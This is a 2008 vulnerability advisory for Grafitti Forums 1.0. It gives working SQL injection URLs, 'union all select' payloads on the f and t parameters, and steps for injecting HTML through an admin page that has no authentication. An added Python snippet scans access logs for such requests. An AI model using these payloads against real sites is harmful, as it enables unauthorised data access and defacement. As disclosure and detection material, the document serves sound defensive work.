Grafitti Forums 1.0 Remote SQL Injection-HTML Injection Vulnerabilities

2008-09-11 17:01:07

############################################################################################################
[+] Grafitti Forums v1.0 Remote SQL Injection/HTML Injection
[+] Discovered By SirGod
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke
############################################################################################################

[+] Remote SQL Injection Vulnerabilities


PoC :

http://[target]/[path]/topics.php?f=[SQL]

Example :

http://127.0.0.1/topics.php?f=-1 union all select version()--
http://127.0.0.1/topics.php?f=-1 union all select database()--
http://127.0.0.1/topics.php?f=-1 union all select user()--

PoC :

http://[target]/[path]/messages.php?t=[SQL]

Example :

http://127.0.0.1/messages.php?t=-1 union all select version()--
http://127.0.0.1/messages.php?t=-1 union all select database()--
http://127.0.0.1/messages.php?t=-1 union all select user()--
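
Added example (not part of the original advisory): a log check for the two parameters above. It assumes f and t are numeric IDs and that the web server writes combined-format access logs; the sample log lines are constructed. Any value that is not a plain integer is flagged, which is also the allow-list rule the scripts should enforce before building a query.

```python
import re
from urllib.parse import urlsplit, parse_qs

# ID parameters named in the advisory, keyed by script (assumed to be numeric IDs).
ID_PARAMS = {"topics.php": "f", "messages.php": "t"}

# Request target inside an access-log entry; lazy match tolerates raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def check_request(target):
    """Return (script, param, value) if an ID parameter is not a plain integer, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qs URL-decodes, so %20 and + encoded values are normalised first.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    for value in values:
        if not re.fullmatch(r"\d{1,10}", value):
            return (script, param, value)
    return None

def scan(lines):
    """Return (line_number, script, param, value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            hit = check_request(m.group(1))
            if hit:
                hits.append((n,) + hit)
    return hits

# Constructed sample log lines (documentation IP addresses, hypothetical /forum/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2008:17:01:07 +0000] "GET /forum/topics.php?f=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Sep/2008:17:02:11 +0000] "GET /forum/topics.php?f=-1%20union%20all%20select%20version()-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [11/Sep/2008:17:02:15 +0000] "GET /forum/messages.php?t=-1+union+all+select+user()-- HTTP/1.1" 200 790',
    '192.0.2.10 - - [11/Sep/2008:17:03:00 +0000] "GET /forum/messages.php?t=12 HTTP/1.1" 200 4301',
    '192.0.2.10 - - [11/Sep/2008:17:03:05 +0000] "GET /forum/index.php?f=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```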


[+] HTML Injection

1. Go to:

http://[target]/[path]/admin.php

2. No authentication is required.

3. Click Add Forum.

4. Fill in the forum name, e.g. Owned (50 characters maximum; HTML code can also be used).

5. Fill in the forum description with any HTML code (100 characters maximum).

############################################################################################################


Fixes

No fixes
